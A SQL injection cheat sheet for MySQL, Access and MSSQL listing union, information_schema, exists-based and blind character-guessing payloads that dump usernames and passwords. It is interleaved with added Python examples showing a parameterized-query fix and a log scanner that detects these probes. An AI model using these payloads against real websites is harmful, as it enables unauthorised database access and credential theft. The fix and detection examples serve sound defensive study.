MySQL chapter
1. Built-in functions and variables
@@datadir, version(), database(), user(), load_file(), select ... into outfile
2. Using concat(), group_concat() and concat_ws() to concatenate query results
Example:
xxx.php?id=1 and 1=2 union select 1, group_concat(username,0x3a,password),3 from user
3. Querying table names and column names through the built-in information_schema database
Query table names:
xxx.php?id=1 and 1=2 union select 1,2,table_name from (select * from information_schema.tables where table_schema=<hex of database name> order by table_schema limit 0,1)t
Query column names:
xxx.php?id=1 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=<hex of table name> and table_schema=<hex of database name> order by 1 limit 1,1)t
This can be combined with the concatenation functions from section 2 to read several columns at once:
xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) from (select * from information_schema.columns where table_name=<hex of table name> and table_schema=<hex of database name> order by 1 limit 0,n)t limit 1-- [n denotes the nth row]
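The union/group_concat technique from sections 2 and 3 is easiest to understand when the vulnerable query and its fix sit side by side. The following is an added example, not code from the original notes: it uses a throwaway in-memory SQLite database (standing in for MySQL, so char(58) replaces 0x3a and || replaces concat()'s comma arguments), a constructed articles/user schema, and hypothetical function names. It shows that the payload dumps the user table when the id is concatenated into the query string, returns nothing when the id is passed as a bound parameter, and never reaches SQL at all when the id is validated as an integer first.

```python
# Added example (not from the original notes): the union/group_concat technique
# run against a throwaway SQLite database, showing the vulnerable string-built
# query next to its parameterized and validated fixes.
import sqlite3

# Constructed sample schema and rows standing in for the notes' "user" table.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO articles VALUES (1, 'hello', 'world');
INSERT INTO user VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
"""

# The payload from the notes, adapted to SQLite: char(58) is ':' (the 0x3a in
# the MySQL version) and || replaces concat()'s comma-separated arguments.
PAYLOAD = ("1 and 1=2 union select 1, "
           "group_concat(username || char(58) || password), 3 from user")


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(id_param):
    """Builds the query by string concatenation: the bug the notes exploit."""
    con = connect()
    sql = "SELECT id, title, body FROM articles WHERE id=" + id_param
    return con.execute(sql).fetchall()


def safe_lookup(id_param):
    """Same query with a bound parameter: the whole payload is compared as one
    literal value against the id column, so no second statement is formed."""
    con = connect()
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return con.execute(sql, (id_param,)).fetchall()


def strict_lookup(id_param):
    """Defence in depth: reject anything that is not an integer before SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return safe_lookup(int(id_param))


if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup(PAYLOAD))   # dumps user:password pairs
    print("parameterized:", safe_lookup(PAYLOAD))      # []
    try:
        strict_lookup(PAYLOAD)
    except ValueError as err:
        print("rejected:", err)
```

The parameterized version is the real fix; the integer check is a cheap second layer that also gives a clean error to log when a probe like the one above arrives.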
Access chapter
Guess table name
*.asp?id=1 and exists (select * from admin)
Guess column name
*.asp?id=1 and exists (select password from admin)
Order by query
*.asp?id=1 order by 3
Union query
*.asp?id=1 union select 1,password,3 from admin
Cases where UNION is not supported
First determine the length of the content:
*.asp?id=1 and (select len(user) from admin)>5
Then guess one character at a time:
*.asp?id=1 and (select asc(mid(user,1,1)) from admin)>97
For example, once you have determined that the value of asc(mid(user,1,1)) is 97, you know that the first character of user is "a".
Then continue guessing from the second position:
*.asp?id=1 and (select asc(mid(user,2,1)) from admin)>97
And so on.
MSSQL chapter
Error-based MSSQL injection:
Determine whether the backend is MSSQL:
' and exists (select * from sysobjects) --
If the page returns normally, the backend is MSSQL; otherwise sysobjects does not exist and the query raises an error.
Guess table name:
' and exists(select * from admin)--
If the table exists, the page returns normally; otherwise the error shows it is not present.
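Every probe in the Access and MSSQL chapters, and the union/information_schema queries in the MySQL chapter, leaves a recognisable trace in the web server's access log. The following is an added example, not code from the original notes: a small scanner that URL-decodes the request path of each log line and flags the specific probe shapes these notes describe. The log lines are constructed in Apache combined format, and the rule names and function names are this example's own.

```python
# Added example (not from the original notes): flag the manual-injection probes
# listed in these notes in web-server access logs.
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines. Entries 1-4 carry probes from the
# notes; 0 and 5 are benign (5 has "union" and "select" as separate words).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /xxx.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /xxx.php?id=1%20and%201=2%20union%20select%201,group_concat(username,0x3a,password),3%20from%20user HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=1+and+exists+(select+*+from+admin) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=1+and+(select+asc(mid(user,1,1))+from+admin)>97 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /xxx.php?id=1%27+and+exists(select+*+from+sysobjects)-- HTTP/1.1" 500 300 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=union+station+select+seats HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# Rule name (this example's own) -> pattern for one probe shape from the notes.
RULES = [
    ("union-select",       re.compile(r"union\s+(all\s+)?select")),
    ("concat-exfil",       re.compile(r"\b(group_concat|concat_ws|concat)\s*\(")),
    ("information-schema", re.compile(r"information_schema\.(tables|columns)")),
    ("exists-probe",       re.compile(r"exists\s*\(\s*select")),
    ("blind-char-probe",   re.compile(r"asc\s*\(\s*mid\s*\(")),
    ("mssql-catalog",      re.compile(r"\b(sysobjects|syscolumns)\b")),
    ("mysql-file-access",  re.compile(r"load_file\s*\(|into\s+outfile|@@datadir")),
]

# Request path out of a combined-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def normalize(raw_path):
    """Decode %xx and + encoding (twice, to catch double encoding), drop inline
    /**/ comments, lower-case and collapse whitespace so spacing tricks do not
    slip past the patterns."""
    text = unquote_plus(unquote_plus(raw_path))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text.lower())


def scan_line(line):
    """Names of every rule whose pattern appears in the decoded request path."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    path = normalize(match.group(1))
    return [name for name, pattern in RULES if pattern.search(path)]


def scan_log(lines):
    """(index, [rule names]) for each line that triggers at least one rule."""
    hits = []
    for idx, line in enumerate(lines):
        rules = scan_line(line)
        if rules:
            hits.append((idx, rules))
    return hits


if __name__ == "__main__":
    for idx, rules in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(rules)}")
```

The blind-injection pattern is the one to watch in volume rather than per request: one asc(mid(...)) probe is noise, but hundreds from a single client in a minute are the character-by-character guessing the Access chapter describes, so pair this rule with a per-client rate threshold.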
SQL Manual Injection Tips